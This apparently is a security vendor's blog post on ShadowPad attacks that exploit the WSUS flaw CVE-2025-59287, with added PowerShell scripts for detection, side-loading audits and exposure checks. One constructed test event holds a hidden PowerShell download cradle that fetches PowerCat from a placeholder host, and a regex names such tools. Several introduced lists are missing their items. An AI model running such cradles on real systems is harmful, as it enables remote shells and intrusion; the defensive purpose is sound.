When you hear about ShadowPad, you know you’re not dealing with ordinary malware. For years, it has been one of the favorite tools of espionage groups linked to the Chinese state—and now it's back, exploiting a critical flaw in Windows Server Update Services (WSUS).
If you manage Windows servers or enterprise infrastructure, this incident directly concerns you. At TecnetOne, we break down what happened, why it’s so dangerous, and what you must do immediately to protect your systems.
According to an analysis by AhnLab Security Intelligence Center (ASEC), malicious actors began exploiting a newly patched WSUS vulnerability—CVE-2025-59287—to gain initial access to Windows servers.
WSUS is the service responsible for distributing updates within corporate networks. It’s a key point for deploying trusted software and patches. Precisely because of this, it's a prime target for attackers.
What’s alarming is that this vulnerability allows for remote code execution with SYSTEM privileges—essentially, full control over the server.
Once the vulnerability is exploited, attackers use PowerCat, a PowerShell-based utility similar to Netcat, to gain a remote shell on the server.
These tools are legitimate and commonly used in IT administration, making them hard to detect by traditional antivirus solutions.
Then, with elevated privileges, attackers download ShadowPad using two well-known commands:
This combination of “normal” tools helps the attack evade detection—especially in companies without advanced monitoring.
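Because the chain described above starts with a WSUS component handing control to a command shell, the most direct detection is a parent/child process check. The following PowerShell is an added example written for this article, not code from ASEC or from the attackers: it evaluates process-creation events in the shape of Sysmon Event ID 1 and flags a WSUS process spawning cmd.exe or PowerShell, or a command line that references PowerCat or a download cradle. The parent names wsusservice.exe and w3wp.exe are our assumption about which WSUS components would spawn the shell; the three sample events are constructed, and the URL in them is a placeholder.

```powershell
# Added example (not from the original article): flag process-creation events where a WSUS
# component spawns a command shell or PowerShell, or where the command line references PowerCat.
# Assumptions: Sysmon Event ID 1 (process creation) is collected; wsusservice.exe and w3wp.exe
# are taken to be the WSUS service and its IIS worker process (our assumption, not stated in
# the article). The sample events below are constructed for this example.

$WsusParents   = @('wsusservice.exe', 'w3wp.exe')
$ShellChildren = @('cmd.exe', 'powershell.exe', 'pwsh.exe')
# Coarse heuristic for PowerCat and common PowerShell download/encoded-command patterns.
$ShellPattern  = 'powercat|Invoke-Expression|\bIEX\b|DownloadString|-enc'

function Test-SuspiciousWsusSpawn {
    param(
        [Parameter(Mandatory)] [string] $ParentImage,
        [Parameter(Mandatory)] [string] $Image,
        [string] $CommandLine = ''
    )
    $parent  = [System.IO.Path]::GetFileName($ParentImage).ToLowerInvariant()
    $child   = [System.IO.Path]::GetFileName($Image).ToLowerInvariant()
    $reasons = @()
    if ($WsusParents -contains $parent -and $ShellChildren -contains $child) {
        $reasons += "WSUS component '$parent' spawned shell '$child'"
    }
    if ($CommandLine -match $ShellPattern) {
        $reasons += "command line matches '$ShellPattern'"
    }
    [pscustomobject]@{
        Suspicious  = ($reasons.Count -gt 0)
        Reasons     = $reasons
        ParentImage = $ParentImage
        Image       = $Image
        CommandLine = $CommandLine
    }
}

# Constructed sample events using the Sysmon Event ID 1 field names (ParentImage, Image, CommandLine).
$SampleEvents = @(
    @{ ParentImage = 'C:\Program Files\Update Services\Service\WsusService.exe'
       Image       = 'C:\Windows\System32\cmd.exe'
       CommandLine = 'cmd.exe /c powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(''http://PLACEHOLDER/powercat.ps1'')"' },
    @{ ParentImage = 'C:\Windows\explorer.exe'
       Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       CommandLine = 'powershell.exe Get-Service' },
    @{ ParentImage = 'C:\Program Files\Update Services\Service\WsusService.exe'
       Image       = 'C:\Windows\System32\conhost.exe'
       CommandLine = 'conhost.exe 0xffffffff' }
)

# Only the first sample should produce an alert (both reasons); the other two are benign.
foreach ($e in $SampleEvents) {
    $r = Test-SuspiciousWsusSpawn -ParentImage $e.ParentImage -Image $e.Image -CommandLine $e.CommandLine
    if ($r.Suspicious) { Write-Warning ("ALERT: {0} | {1}" -f ($r.Reasons -join '; '), $r.CommandLine) }
}

# On a real host with Sysmon installed: read recent Event ID 1 records and evaluate each one.
function Get-SuspiciousWsusSpawnFromSysmon {
    param([int] $MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $x = [xml]$_.ToXml()
            $d = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            Test-SuspiciousWsusSpawn -ParentImage $d['ParentImage'] -Image $d['Image'] -CommandLine $d['CommandLine']
        } | Where-Object Suspicious
}
```

The parent/child rule is the durable part: PowerCat can be renamed and the download cradle obfuscated, but a WSUS service process has no legitimate reason to launch a shell, so that relationship alone is worth an alert in your SIEM.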
ShadowPad is not your average malware. It’s a modular backdoor used almost exclusively by Chinese espionage groups. SentinelOne once called it “a masterpiece of espionage malware.”
Its capabilities include:
It’s widely considered the successor to PlugX, another well-known Chinese APT malware.
Although no group has officially claimed the current attack, the use of ShadowPad strongly suggests a sophisticated threat actor.
ShadowPad installed via CVE-2025-59287 exploit (Source: The Hacker News)
To execute ShadowPad, attackers used DLL side-loading, a method where a malicious DLL is placed where a legitimate app expects an official library.
The process went like this:
This method is favored by APT groups because it avoids file-based detection and complicates forensic analysis.
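Since side-loading relies on a malicious DLL sitting beside a legitimate, signed executable, one practical hunt is to audit that pairing directly. The script below is an added example for this article (not code from the researchers or the incident): for every EXE in a directory it checks each neighbouring DLL with Get-AuthenticodeSignature and reports DLLs that are unsigned, carry an invalid signature, are signed by a different publisher than the EXE, or were modified well after it. The directory path is a placeholder and the "modified after the EXE" test is our heuristic, so expect some noise from legitimate vendor updates.

```powershell
# Added example (not from the original article): audit an application directory for DLL
# side-loading candidates. For every EXE in the folder, each DLL beside it is checked with
# Get-AuthenticodeSignature; unsigned DLLs, invalid signatures, a publisher that differs from
# the EXE's, and DLLs modified well after the EXE are reported. The path and the timestamp
# heuristic are assumptions made for this example, not details of the reported incident.

function Get-SideLoadCandidate {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [switch] $IncludeValid   # also list DLLs that pass every check
    )
    $exes = Get-ChildItem -Path $Path -Filter *.exe -File -ErrorAction Stop
    $dlls = Get-ChildItem -Path $Path -Filter *.dll -File

    foreach ($exe in $exes) {
        $exeSig    = Get-AuthenticodeSignature -FilePath $exe.FullName
        $exeSigner = if ($exeSig.SignerCertificate) { $exeSig.SignerCertificate.Subject } else { $null }

        foreach ($dll in $dlls) {
            $dllSig    = Get-AuthenticodeSignature -FilePath $dll.FullName
            $dllSigner = if ($dllSig.SignerCertificate) { $dllSig.SignerCertificate.Subject } else { $null }
            $findings  = @()

            # NotSigned, HashMismatch, UnknownError etc. are all worth a look next to a signed EXE.
            if ($dllSig.Status -ne 'Valid') {
                $findings += "signature status $($dllSig.Status)"
            }
            # A validly signed DLL from a different publisher than the host EXE is the classic
            # side-loading shape (legitimate vendor binary, attacker-supplied library).
            if ($exeSigner -and $dllSigner -and ($exeSigner -ne $dllSigner)) {
                $findings += "signer differs from $($exe.Name)"
            }
            # Heuristic (our assumption): a DLL written long after the EXE it would be loaded by.
            if ($dll.LastWriteTime -gt $exe.LastWriteTime.AddDays(1)) {
                $findings += "modified after $($exe.Name)"
            }

            if ($findings.Count -gt 0 -or $IncludeValid) {
                [pscustomobject]@{
                    Executable = $exe.Name
                    Dll        = $dll.Name
                    DllStatus  = $dllSig.Status
                    DllSigner  = $dllSigner
                    ExeSigner  = $exeSigner
                    Findings   = ($findings -join '; ')
                    Sha256     = (Get-FileHash -Path $dll.FullName -Algorithm SHA256).Hash
                }
            }
        }
    }
}

# Usage: point it at a folder where an unexpected EXE+DLL pair appeared (temp, ProgramData,
# user profiles), or at a vendor folder you want to baseline. The path below is a placeholder.
Get-SideLoadCandidate -Path 'C:\ProgramData\PLACEHOLDER_SUSPECT_DIR' | Format-Table -AutoSize
```

The SHA256 column is there so that anything flagged can be checked against your threat-intel feeds; a hit on the hash of a signed, legitimate EXE with an unsigned DLL beside it in an odd location is exactly the pattern this section describes.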
Once deployed, ShadowPad’s main module activates:
With this, attackers have persistent, full control—even after rebooting or changing configurations.
For companies lacking advanced detection, the intrusion may remain unnoticed for weeks or months.
As expected, exploitation surged within 48 hours of the public Proof of Concept (PoC).
Threat actors began scanning the internet for exposed WSUS instances. ASEC confirmed that many attacks followed an automated pattern:
Some attackers even deployed Velociraptor, a legitimate digital forensics tool, likely to evaluate the environment or assess the value of the target.
If you run Windows servers—especially with internal WSUS—you should be on high alert.
This vulnerability:
In short, it’s a perfect storm for corporate espionage, sabotage, data theft, or lateral movement into high-value assets.
And it doesn’t just affect large companies—any exposed or misconfigured WSUS is fair game.
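A quick way to find out whether your own WSUS host is one of the "exposed or misconfigured" ones is to check it from the inside. The following PowerShell is an added example written for this article, not something from the original report: on a Windows Server it reports whether the WSUS role is installed, whether the default WSUS ports are listening, and which enabled inbound firewall rules open those ports to any remote address. The ports 8530 (HTTP) and 8531 (HTTPS) are WSUS defaults; a customised deployment may use others, and the script does not check patch state, which you must verify separately.

```powershell
# Added example (not from the original article): local exposure check for a WSUS host.
# Requires the ServerManager and NetSecurity modules that ship with Windows Server.
# Assumptions: ports 8530/8531 are the WSUS defaults (override with -Ports for custom setups);
# perimeter NAT/firewalls are outside the host's view, so "Exposed" here means "reachable
# from any address at the host firewall", not "reachable from the internet".
function Get-WsusExposure {
    param([int[]] $Ports = @(8530, 8531))

    $role      = Get-WindowsFeature -Name UpdateServices -ErrorAction SilentlyContinue
    $installed = [bool]($role -and $role.Installed)

    # Sockets listening on the WSUS ports, with the owning process name.
    $listeners = Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
        Where-Object { $Ports -contains $_.LocalPort } |
        ForEach-Object {
            [pscustomobject]@{
                LocalAddress = $_.LocalAddress
                LocalPort    = $_.LocalPort
                Process      = (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).ProcessName
            }
        }

    # Enabled inbound allow rules that open a WSUS port (or every port) to any remote address.
    # Port filters are strings and may contain 'Any' or ranges such as '8530-8531'; exact
    # matches and 'Any' are handled here, ranges are left for manual review.
    $wantedPorts = $Ports | ForEach-Object { "$_" }
    $openRules = foreach ($rule in Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True -ErrorAction SilentlyContinue) {
        $portFilter = $rule | Get-NetFirewallPortFilter
        $addrFilter = $rule | Get-NetFirewallAddressFilter
        $rulePorts  = @($portFilter.LocalPort)
        $hitsPort   = ($rulePorts -contains 'Any') -or ($wantedPorts | Where-Object { $rulePorts -contains $_ })
        if ($hitsPort -and (@($addrFilter.RemoteAddress) -contains 'Any')) {
            [pscustomobject]@{ Rule = $rule.DisplayName; Ports = ($rulePorts -join ','); Profile = $rule.Profile }
        }
    }

    [pscustomobject]@{
        ComputerName      = $env:COMPUTERNAME
        WsusRoleInstalled = $installed
        Listeners         = $listeners
        OpenToAnyRules    = $openRules
        Exposed           = [bool]($installed -and $listeners -and $openRules)
    }
}

Get-WsusExposure | Format-List
```

If Exposed comes back True, the immediate fix is to restrict the inbound rules to the client subnets that actually need WSUS, then confirm the server carries the CVE-2025-59287 patch; internal WSUS servers should never be reachable from untrusted networks in the first place.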
To prevent ShadowPad operators and others from exploiting this flaw, we recommend:
ShadowPad’s exploitation of a critical WSUS vulnerability is more than just another incident—it’s a warning sign of how digital espionage is evolving. One poorly secured service can give attackers the keys to your entire infrastructure.
At TecnetOne, we always say the same thing: your defensive speed must match the attacker's.
Patch, monitor, and audit—because letting a nation-grade threat take over your systems is no longer a far-fetched scenario. It's one click away.